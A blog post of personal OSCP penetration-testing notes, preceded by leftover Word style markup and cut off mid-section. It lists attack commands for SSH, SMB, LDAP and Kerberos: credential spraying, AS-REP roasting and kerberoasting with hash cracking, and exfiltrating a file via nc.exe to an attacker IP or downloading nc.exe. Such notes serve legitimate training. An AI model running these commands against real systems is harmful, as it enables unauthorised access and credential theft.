<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="46" Name="List Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="List Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="List Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Mention"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Smart Hyperlink"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Hashtag"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Unresolved Mention"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Smart Link"/>
</w:LatentStyles>
</xml><![endif]-->
<span style="font-family: inherit;"><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="false"
DefSemiHidden="false" DefQFormat="false" DefPriority="99"
LatentStyleCount="376">
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Balloon Text"/>
<w:LsdException Locked="false" Priority="39" Name="Table Grid"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Theme"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" QFormat="true"
Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" QFormat="true"
Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" QFormat="true"
Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" QFormat="true"
Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" QFormat="true"
Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" QFormat="true"
Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" SemiHidden="true"
UnhideWhenUsed="true" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="TOC Heading"/>
<w:LsdException Locked="false" Priority="41" Name="Plain Table 1"/>
<w:LsdException Locked="false" Priority="42" Name="Plain Table 2"/>
<w:LsdException Locked="false" Priority="43" Name="Plain Table 3"/>
<w:LsdException Locked="false" Priority="44" Name="Plain Table 4"/>
<w:LsdException Locked="false" Priority="45" Name="Plain Table 5"/>
<w:LsdException Locked="false" Priority="40" Name="Grid Table Light"/>
<w:LsdException Locked="false" Priority="46" Name="Grid Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="Grid Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="Grid Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="46" Name="List Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="List Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="List Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Mention"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Smart Hyperlink"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Hashtag"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Unresolved Mention"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Smart Link"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<![endif]--></span>
<p></p></div>Latish Danawalehttp://www.blogger.com/profile/00084840439148244930noreply@blogger.com0tag:blogger.com,1999:blog-1382879664613470931.post-6036388374982472172020-08-14T20:00:00.000-07:002020-08-14T20:00:40.070-07:00OSCP - Personal Notes<div class="separator" style="clear: both; text-align: center;"><span style="color: black;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpnL4tRlEOJpT8zlbWUEm_43ZzjFrXX0Le_EKgZKHXwdVoNDH1aE1dql57AGNwp9jHhStYbLZZG2QdMKPA-42NFnKCAYZe9USmdkAqBVc3eNoMfMJvjMc04BoxgyUvwDlEZUOHlXDRC2g/s500/unnamed.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="414" data-original-width="500" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpnL4tRlEOJpT8zlbWUEm_43ZzjFrXX0Le_EKgZKHXwdVoNDH1aE1dql57AGNwp9jHhStYbLZZG2QdMKPA-42NFnKCAYZe9USmdkAqBVc3eNoMfMJvjMc04BoxgyUvwDlEZUOHlXDRC2g/s0/unnamed.jpg" /></a></span></div><p style="text-align: left;"><span style="color: red;"><span style="color: black;"><span style="color: #04ff00;">Hey Guys, in this post I am just going to copy-paste my notes, which I collected during my OSCP journey from different sources. 
Feel free to collaborate.</span> 💀 </span><br /></span></p><h3 style="text-align: left;"><span style="color: red;">[*] SSH - 22</span></h3><p>Tunneling<br />ssh -L 8443:127.0.0.1:8443 user@x.x.x.x<br /><br />Credentials Spraying<br />ncrack -U users.txt -P pass.txt ssh://x.x.x.x<br /><br /></p><h3 style="text-align: left;"><span style="color: red;">[*] DNS - 53</span></h3><p>Perform DNS Zone Transfer check<br />dig axfr x.x.x.x<br />dig axfr vhost.com @x.x.x.x </p><h3 style="text-align: left;"><span style="color: red;">[*] TCPDUMP</span></h3><p>tcpdump -i eth0 icmp</p><h3 style="text-align: left;"><span style="color: red;">[*] SMB</span></h3><p>1. SMB Protocol enumeration:<br />nmap -p445 --script smb-protocols x.x.x.x<br /><br />2. Check for SMB Vulnerability<br />nmap --script smb-vuln* x.x.x.x<br /><br />3. Get a list of shares available on a host<br />smbclient -L x.x.x.x<br /><br />4. Connect to the share<br />smbclient //x.x.x.x/Share_Name<br /><br />5. SMBMap for checking access on fileshares<br />smbmap -H x.x.x.x -u Username -p Password or smbmap -u '' -p '' -d 'htb.local' -H x.x.x.x<br /><br />6. Download all files in shares:<br />smbget -R smb://x.x.x.x/Share -U Username<br /><br />7. Use crackmapexec for spraying<br />crackmapexec smb 10.10.10.175 -u Users.txt -p Pass.txt --continue-on-success<br /><br />8. Host smbserver by using impacket<br />impacket-smbserver -smb2support htb $(pwd)</p><p>9. Anonymous login and file enumeration using smbmap<br />smbmap -H x.x.x.x -u anonymous -r --depth<span></span><span></span><span></span></p><p></p><h3 style="text-align: left;"><span style="color: red;">[*] LDAP</span></h3><p>1. Basic enumeration<br />ldapsearch -x -h htb.local -b "dc=htb,dc=local"<br /><br />2. Check for Null enumeration<br />ldapsearch -x -h x.x.x.x -D '' -w '' -b "DC=domain,DC=local"<br /><br /></p><h3 style="text-align: left;"><span style="color: red;">[*] File Transfers</span></h3><p>1. 
certutil<br />certutil -encode file.zip file.b64<br />cat file.b64 | cmd /c C:\windows\temp\nc.exe attacker_IP 4444<br />And locally:<br /><br />nc -lvp 4444 > file.b64 // Remove the BEGIN/END CERTIFICATE marker lines that certutil adds at the top and bottom<br />sed -i 's/\r$//' file.b64 // Strip the CRLF line endings certutil writes; base64 -d tolerates newlines but not carriage returns<br />base64 -d file.b64 > file.zip<br /><br />2. certutil -urlcache -split -f http://x.x.x.x/nc.exe C:\\users\public\nc.exe<br /><br />3. (New-Object Net.WebClient).DownloadFile('http://10.10.14.102:8000/test.txt','test.txt')</p><p>4. iwr -uri http://x.x.x.x:8080/nc.exe -outfile /tmp/nc.exe</p><h3 style="text-align: left;"><span style="color: red;">[*] Virtual Host scanning</span></h3><p>https://github.com/codingo/VHostScan<br />VHostScan -t local.domain -w /opt/VHostScan/VHostScan/wordlists/virtual-hostscanning.txt</p><h3 style="text-align: left;"><span style="color: red;">[*] Impacket Script</span></h3><p>1. Get the password hash of user accounts:<br />python3 GetNPUsers.py local.domain/ -dc-ip 10.10.10.175 -request -usersfile users.txt (users.txt lists the usernames to try)<br /><br />Then use the command below to crack the hash:<br />hashcat -m 18200 -a 0 Hash.txt /usr/share/wordlists/rockyou.txt --force<br /><br />2. Enumerate domain users<br />python3 GetADUsers.py -all local.domain/User -dc-ip x.x.x.x</p><p>3. Use this script to check if any user is vulnerable to kerberoasting.<br />GetUserSPNs.py -request -dc-ip x.x.x.x local.domain/user</p><h3 style="text-align: left;"><span style="color: red;">[*] MSSQL - 1433</span></h3><p>1. Use the Impacket script mssqlclient.py to 